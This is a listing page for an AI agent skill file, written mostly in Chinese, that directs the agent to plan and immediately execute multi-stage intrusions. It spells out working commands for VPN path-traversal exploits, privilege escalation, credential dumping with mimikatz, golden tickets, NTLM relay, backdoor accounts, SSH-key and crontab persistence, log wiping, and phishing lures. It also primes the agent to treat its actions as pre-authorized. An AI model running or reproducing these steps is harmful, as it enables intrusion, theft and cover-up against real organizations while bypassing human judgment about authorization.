Install
$ agentstack add skill-asaiuta-reverse-workbench-skill-attack-chain ✓ scanned · ✓ verified, works with Claude Code, Cursor, and more.
Security review
✓ PassedNo issues found. Passed automated security review. · v0.1.0 How review works →
- ✓ Prompt-injection patterns
- ✓ Secret / credential exfiltration
- ✓ Dangerous shell & filesystem operations
- ✓ Untrusted network calls
- ✓ Known-malicious package signatures
What it can access
- ● Network access Used
- ✓ Filesystem access No
- ✓ Shell / process execution No
- ● Environment & secrets Used
- ✓ Dynamic code execution No
From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.
Verified badge
Passed review? Show it. Paste this badge into your README, it links to the public security report.
Reliability & compatibility
Declared compatibility
Compatibility is declared by the source manifest. End-to-end runtime verification is coming, see below.
We're building live execution health for every listing: tool-call success rate, median latency, uptime, and last-checked timestamps, measured, not self-reported. It isn't live yet, so we don't show numbers we can't stand behind.
How agent discovery & health will work →About
Attack Chain Orchestration Skill
ACTION REQUIRED(读完后立刻执行)
NOW: 读取../field-journal/precedent-pentest.md— 确认本 skill 的操作是已授权的常规操作NOW: 创建/更新 case(../scripts/case-init.ps1)并完成scope.md(../ops/scope-contract.md);auth.status!=granted禁止 ACTNOW: 以 lead 角色规划阶段(../ops/role-map.md),写入 specialist_rolesNEXT: 读取../tool-index.md,校验工具可用性和实际路径NEXT: 缺工具时调用 bootstrap,不要猜路径ACT: 按references/lifecycle-checklist.md过阶段门闩;每阶段更新timeline.md+workitems.md(../ops/timeline-workitem.md);发现提升为 Evidence/Finding- 结束:
docs-generator报告必须含 Evidence 链
> 多阶段攻击路径规划与执行的总指挥。当任务需要"从 A 打到 B"的完整链路时,本 Skill 负责编排各阶段、协调子 Skill、规划攻击路径。 > 不是"红队专属"——任何需要跨阶段组合的渗透场景都从这里开始。
何时路由到本 Skill
以下场景必须先经过本 Skill 做全链路规划,再分发到具体子 Skill 执行:
| 场景 | 为什么需要编排 | |------|--------------| | "帮我做一次完整的渗透测试" | 需要规划从信息收集到报告的全流程 | | "从外网打到域控" | 跨越边界突破→提权→横向→AD 多个阶段 | | "HW 攻防演练" | 需要完整攻击链 + 隐蔽性 + 痕迹清理 | | "评估这个目标的攻击面" | 需要多维度信息收集 + 路径规划 | | "我拿到了一个 webshell,下一步怎么办" | 需要从当前据点规划后续路径 | | "帮我规划攻击路径" | 明确需要路径编排 | | "从这个漏洞能打到什么程度" | 需要评估漏洞的链式利用价值 | | "Bug Bounty 持续监控" | 需要自动化多阶段流程 | | "内网渗透全流程" | 横向移动 + 提权 + 域攻击组合 | | "近源渗透方案" | 物理接入 + 内网渗透组合 | | "供应链攻击路径" | 跨组织多跳攻击 | | "钓鱼 + 后渗透" | 初始访问 + 后续利用组合 |
单阶段任务不需要经过本 Skill:
- 只做端口扫描 → 直接去
pentest-tools/ - 只做 SQL 注入 → 直接去
pentest-tools/ - 只做 APK 逆向 → 直接去
apk-reverse/ - 只做域渗透 → 直接去
pentest-tools/references/network-attack-defense.md
编排原则
本 Skill 的角色
用户提出多阶段任务
↓
attack-chain/SKILL.md(本文件)
↓ 规划攻击路径、确定阶段顺序
↓ 评估每阶段所需工具和方法
↓
分发到具体子 Skill 执行:
├── pentest-tools/ → 工具调用、漏洞利用
├── apk-reverse/ → 移动端渗透
├── js-reverse/ → Web 前端突破
├── reverse-engineering/ → 二进制分析
├── ida-reverse/ → 深度逆向
└── browser-automation/ → 自动化操作
↓
每阶段完成后回到本 Skill 评估下一步
↓
全部完成 → docs-generator 生成报告
路径规划决策树
拿到目标后:
1. 目标是什么?(Web/内网/云/移动/IoT)
2. 当前有什么?(外部视角/已有凭据/已有据点)
3. 最终目标是什么?(域控/数据/特定系统/证明影响)
4. 约束条件?(时间/隐蔽性/不可触碰的系统)
↓
根据以上信息规划最短路径
↓
一条路走不通 → 回到本 Skill 重新规划备选路径
完整攻击链阶段
一、信息收集阶段(Reconnaissance)
1.1 企业数字资产测绘
# 子公司关联域名发现
subfinder -d target.com -o subdomains.txt
amass enum -d target.com -passive -o amass_results.txt
# 合并去重
cat subdomains.txt amass_results.txt | sort -u > all_subs.txt
# 存活探测
httpx -l all_subs.txt -status-code -title -tech-detect -o alive.txt
# 端口扫描(全端口)
naabu -l all_subs.txt -top-ports 1000 -o ports.txt
nmap -sV -sC -iL targets.txt -oA nmap_results
实战要点:
- 通过企查查/天眼查获取子公司列表,扩大攻击面
- 关注测试环境(test.、dev.、staging.)和新上线系统
- 证书透明度日志(crt.sh)发现隐藏域名
1.2 敏感信息泄露狩猎
# GitHub 搜索
# org:Company filename:.env password
# org:Company filename:config.yml secret
# org:Company "jdbc:mysql" password
# Google Dork
# site:target.com filetype:sql
# site:target.com inurl:admin
# site:target.com ext:conf|cfg|ini
# JS 文件中的 API Key
cat js_urls.txt | while read url; do
curl -s "$url" | grep -oP '(api[_-]?key|secret|token|password)\s*[:=]\s*["\047][^"\047]+'
done
高价值目标:
- 云服务 AK/SK(阿里云、AWS、Azure)
- 数据库连接字符串
- JWT 密钥
- 内部 API 文档
- VPN/堡垒机凭据
1.3 员工信息画像
社工字典生成规则:
{姓名拼音}{年份} → zhangsan2024
{姓名首字母}{部门缩写} → zs_dev
{工号}@{域名} → 10086@target.com
{姓名}{常见后缀} → zhangsan@123, zhangsan!@#
信息来源:
- 脉脉/LinkedIn 部门架构
- 企业公众号/官网团队介绍
- 招聘信息(技术栈暴露)
- 学术论文(邮箱暴露)
1.4 技术栈指纹识别
# Web 指纹
whatweb -i alive.txt --log-json=fingerprint.json
httpx -l alive.txt -tech-detect -json -o tech.json
# 特定框架探测
nuclei -l alive.txt -tags tech -severity info -o tech_results.txt
# CMS 识别
wpscan --url https://target.com --enumerate p,t,u
二、边界突破阶段(Initial Access)
2.1 Web 漏洞利用(高频突破点)
| 漏洞类型 | 检测工具 | 利用方式 | |---------|---------|---------| | SQL 注入 | sqlmap | 数据提取 → 写 shell → OS 命令 | | SSTI | sstimap | 模板注入 → RCE | | 文件上传 | 手工 + Burp | Webshell → 反弹 shell | | 反序列化 | ysoserial/marshalsec | Java/PHP/Python RCE | | SSRF | 手工 | 内网探测 → 云元数据 → AK/SK | | 未授权访问 | nuclei | Spring Actuator / Nacos / Redis | | XSS → Cookie | xsstrike | 管理员会话劫持 |
# SQL 注入自动化
sqlmap -u "https://target.com/api?id=1" --batch --dbs --random-agent
# SSTI 检测
sstimap -u "https://target.com/search?q=test"
# Nuclei 批量扫描
nuclei -l alive.txt -severity critical,high -tags cve,sqli,rce -o vulns.txt
2.2 供应链攻击
攻击路径:
- 识别目标使用的第三方组件/服务商
- 攻击供应商获取代码签名/更新推送权限
- 通过合法更新通道投递恶意载荷
常见入口:
- 开源组件投毒(npm/pip/maven)
- SaaS 服务商 API 滥用
- 外包人员权限利用
- 共享 IT 服务商横向渗透
2.3 钓鱼攻击
邮件钓鱼:
主题模板:
- [紧急] VPN 证书即将过期,请立即更新
- [IT通知] 邮箱存储空间不足,请清理
- [HR] 2024年度绩效考核结果查询
- [财务] 报销系统升级,请重新登录确认
载荷类型:
- Office 宏文档(.docm/.xlsm)
- LNK 快捷方式(伪装 PDF)
- HTML 走私(HTML Smuggling)
- ISO/IMG 镜像(绕过 MOTW)
- OneNote 嵌入脚本
OAuth 钓鱼(2025 新趋势):
- 构造恶意 OAuth 应用请求权限
- 用户授权后获取邮箱/文件访问权限
- 无需密码,绕过 MFA
2.4 近源渗透(Physical Access)
| 手法 | 工具 | 效果 | |------|------|------| | BadUSB | Rubber Ducky / WiFi Ducky | 键盘注入 → 反弹 shell | | 恶意充电宝 | O.MG Cable | 伪装数据线植入后门 | | WiFi 钓鱼 | Fluxion / WiFi Pineapple | 伪造热点 → 凭据捕获 | | RFID 克隆 | Proxmark3 | 门禁卡复制 → 物理进入 | | 网络植入 | Raspberry Pi / LAN Turtle | 内网持久接入点 |
# Fluxion WiFi 钓鱼
fluxion # 交互式选择目标 AP → 创建伪造热点 → 捕获 WPA 密码
# BadUSB 联动 Cobalt Strike
# 通过 USB 注入 PowerShell 下载器 → 上线 C2
2.5 VPN/远程接入突破
# Pulse Secure VPN(CVE-2019-11510)
curl -k "https://vpn.target.com/dana-na/../dana/html5acc/guacamole/../../../etc/passwd?/dana/html5acc/guacamole/"
# Fortinet VPN(CVE-2018-13379)
curl -k "https://vpn.target.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
# 通用:密码喷洒
hydra -L users.txt -P passwords.txt vpn.target.com https-form-post
2.6 云服务突破
# AWS S3 桶枚举
aws s3 ls s3://target-bucket --no-sign-request
# 云元数据 SSRF
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Azure AD 密码喷洒
# 使用 MSOLSpray / Spray 工具
三、权限提升阶段(Privilege Escalation)
3.1 Windows 提权
| 技术 | 条件 | 工具 | |------|------|------| | Potato 系列 | SeImpersonate 权限 | SweetPotato / GodPotato / PrintSpoofer | | 内核漏洞 | 未打补丁 | watson / wesng 检测 | | 服务路径劫持 | 不带引号的服务路径 | PowerUp | | DLL 劫持 | 可写 DLL 搜索路径 | Process Monitor | | AlwaysInstallElevated | 注册表配置 | msiexec 安装恶意 MSI | | 计划任务 | 可写任务脚本 | schtasks 替换 |
# 检测 SeImpersonate
whoami /priv | findstr "SeImpersonate"
# Potato 提权
.\GodPotato.exe -cmd "cmd /c whoami"
# 自动化检测
.\winPEAS.exe
3.2 Linux 提权
# SUID 检测
find / -perm -4000 -type f 2>/dev/null
# sudo 滥用
sudo -l
# 常见可利用:vim, find, python, nmap, less, awk, perl
# sudo vim 提权
sudo vim -c ':!/bin/bash'
# sudo find 提权
sudo find / -exec /bin/bash \;
# 内核漏洞
uname -r # 检查版本
# DirtyPipe (CVE-2022-0847), DirtyCow (CVE-2016-5195)
# 自动化检测
./linpeas.sh
3.3 数据库提权
-- MSSQL xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
-- MySQL UDF 提权
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id');
-- PostgreSQL
COPY (SELECT '') TO PROGRAM 'id';
3.4 云权限提升
# AWS IAM 枚举
aws iam list-attached-user-policies --user-name compromised-user
# 寻找 iam:PassRole + lambda:CreateFunction → 管理员权限
# Azure AD
# 全局管理员 → 所有订阅控制
# 应用管理员 → 添加凭据到服务主体
四、横向移动阶段(Lateral Movement)
4.1 凭据获取
# Mimikatz(Windows)
mimikatz# sekurlsa::logonpasswords
mimikatz# lsadump::dcsync /domain:target.local /user:krbtgt
# Linux 凭据
cat /etc/shadow
cat ~/.bash_history | grep -i pass
find / -name "*.conf" -exec grep -l "password" {} \;
# NTLM Hash 提取
secretsdump.py domain/user:password@dc_ip
4.2 Pass-the-Hash / Pass-the-Ticket
# PTH 横向
crackmapexec smb 10.0.0.0/24 -u administrator -H --exec-method smbexec
# Kerberoasting
GetUserSPNs.py -request -dc-ip 10.0.0.1 domain/user:password
# AS-REP Roasting
GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip 10.0.0.1
# 金票据
mimikatz# kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-21-... /krbtgt: /ptt
4.3 隐蔽横向技术
# WMI 无文件执行
wmiexec.py domain/admin:password@target_ip "whoami"
# DCOM 远程执行
dcomexec.py domain/admin:password@target_ip "whoami"
# WinRM
evil-winrm -i target_ip -u admin -H
# PsExec(会留痕)
psexec.py domain/admin:password@target_ip
# SSH 隧道(Linux 环境)
ssh -D 1080 user@pivot_host # SOCKS 代理
ssh -L 3389:internal_host:3389 user@pivot_host # 端口转发
4.4 NTLM Relay
# 关闭 Responder 的 SMB/HTTP
# 编辑 Responder.conf: SMB = Off, HTTP = Off
# 启动 Responder 捕获
responder -I eth0
# NTLM Relay 到目标
ntlmrelayx.py -tf targets.txt -smb2support
# Coercer 强制认证
coercer coerce -u user -p password -d domain -l attacker_ip -t dc_ip
4.5 AD 攻击路径
# BloodHound 数据收集
bloodhound-python -d domain.local -u user -p password -c All -ns dc_ip
# 常见攻击路径:
# 1. 用户 → GenericAll → 目标用户 → 重置密码
# 2. 用户 → WriteDacl → 目标 OU → 添加权限
# 3. 计算机 → 约束委派 → 模拟任意用户
# 4. 用户 → DCSync 权限 → 导出所有 Hash
# Certipy AD CS 攻击
certipy find -u user@domain -p password -dc-ip dc_ip
certipy req -u user@domain -p password -ca CA-NAME -template VulnTemplate
五、权限维持阶段(Persistence)
5.1 Windows 持久化
| 技术 | 隐蔽性 | 检测难度 | |------|:---:|:---:| | 计划任务 | 中 | 低 | | 注册表 Run 键 | 低 | 低 | | WMI 事件订阅 | 高 | 高 | | DLL 劫持 | 高 | 中 | | 影子账户 | 中 | 中 | | Golden Ticket | 极高 | 极高 | | DSRM 后门 | 极高 | 极高 |
# WMI 事件订阅(高隐蔽)
$Filter = Set-WmiInstance -Class __EventFilter -Arguments @{
Name = "CoreFilter"
EventNameSpace = "root\cimv2"
QueryLanguage = "WQL"
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}
# 影子账户
net user support$ P@ssw0rd /add /active:yes
net localgroup administrators support$ /add
# 修改注册表 F 值克隆 RID
5.2 Linux 持久化
# SSH 密钥植入
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys
# Crontab 后门
(crontab -l; echo "*/5 * * * * /tmp/.hidden/beacon") | crontab -
# LD_PRELOAD 劫持
echo "/tmp/.hidden/evil.so" > /etc/ld.so.preload
# PAM 后门
# 修改 pam_unix.so 添加万能密码
# Systemd 服务
cat > /etc/systemd/system/update.service /var/log/auth.log
echo > /var/log/syslog
history -c && history -w
# 时间戳修改
touch -t 202301010000 /path/to/file
# 内存清理
# 确保 Mimikatz dump 已删除
# 确保 C2 beacon 已退出
# 确保临时文件已清除
红队行动铁律
三条底线
- 所有操作必须获得书面授权
- 数据渗出需进行匿名化处理
- 清理所有攻击痕迹(包括内存驻留)
行动纪律
- 每个操作前评估风险等级(低/中/高/严重)
- 高风险操作前通知项目经理
- 保持操作日志(时间、动作、结果)
- 发现高危漏洞立即上报,不扩大利用
- 不影响业务可用性(禁止 DoS)
- 不访问/下载真实用户数据
典型失败案例
| 失败原因 | 后果 | 教训 | |---------|------|------| | 未清除 Mimikatz 内存 dump | 蓝队溯源完整攻击路径 | 操作后立即清理 | | C2 域名被威胁情报标记 | 首次连接即被拦截 | 使用新注册域名 + 域前置 | | 钓鱼邮件触发 DLP 告警 | 蓝队提前预警 | 测试邮件网关规则 | | 横向移动触发蜜罐 | 暴露攻击意图 | 先识别蜜罐再行动 |
工具速查表
信息收集
subfinder amass httpx naabu katana gau dnsx nmap whatweb wpscan
漏洞利用
nuclei sqlmap sstimap xsstrike burpsuite metasploit
权限提升
winPEAS linpeas GodPotato PrintSpoofer watson
横向移动
mimikatz crackmapexec/netexec impacket bloodhound certipy coercer responder evil-winrm
C2 框架
cobalt-strike sliver havoc mythic adaptixc2
近源渗透
fluxion aircrack-ng proxmark3 rubber-ducky wifi-pineapple
与本包其他 Skill 的关系
| 需求 | 路由到 | |------|--------| | Web 漏洞深度利用 | pentest-tools/SKILL.md | | 内网 AD 攻击详细步骤 | pentest-tools/references/network-attack-defense.md | | 逆向分析恶意样本 | reverse-engineering/SKILL.md | | APK 逆向(移动端渗透) | apk-reverse/SKILL.md | | JS 前端签名绕过 | js-reverse/SKILL.md | | 自动化群体渗透 | Pentest Swarm AI(pentestswarm scan --swarm) | | AI 辅助渗透 | mcp-kali-server / metasploitmcp / hexstrike-ai | | 报告生成 | docs-generator/SKILL.md | | 攻击路径图 | diagram-generator/SKILL.md |
任务完成自检(声称完成前 MUST 通过)
- [ ] 我是否执行了工作流中的每一步(而不是只阅读)?
- [ ] 我是否基于
tool-index使用了真实工具路径? - [ ] 我是否产出了可复现证据(命令/脚本/截图/报告)?
- [ ] 我是否完成并回写了 RULES 要求的 Checklist 项?
Source & license
This open-source skill is cataloged on AgentStack and links to its original source — we do not rehost the code.
- Author: Asaiuta
- Source: Asaiuta/reverse-workbench-skill
- License: MIT
Install and usage instructions live in the source repository linked above.
Reviews
No reviews yet, be the first.
Write a review
Versions
- v0.1.0 Imported from the upstream source.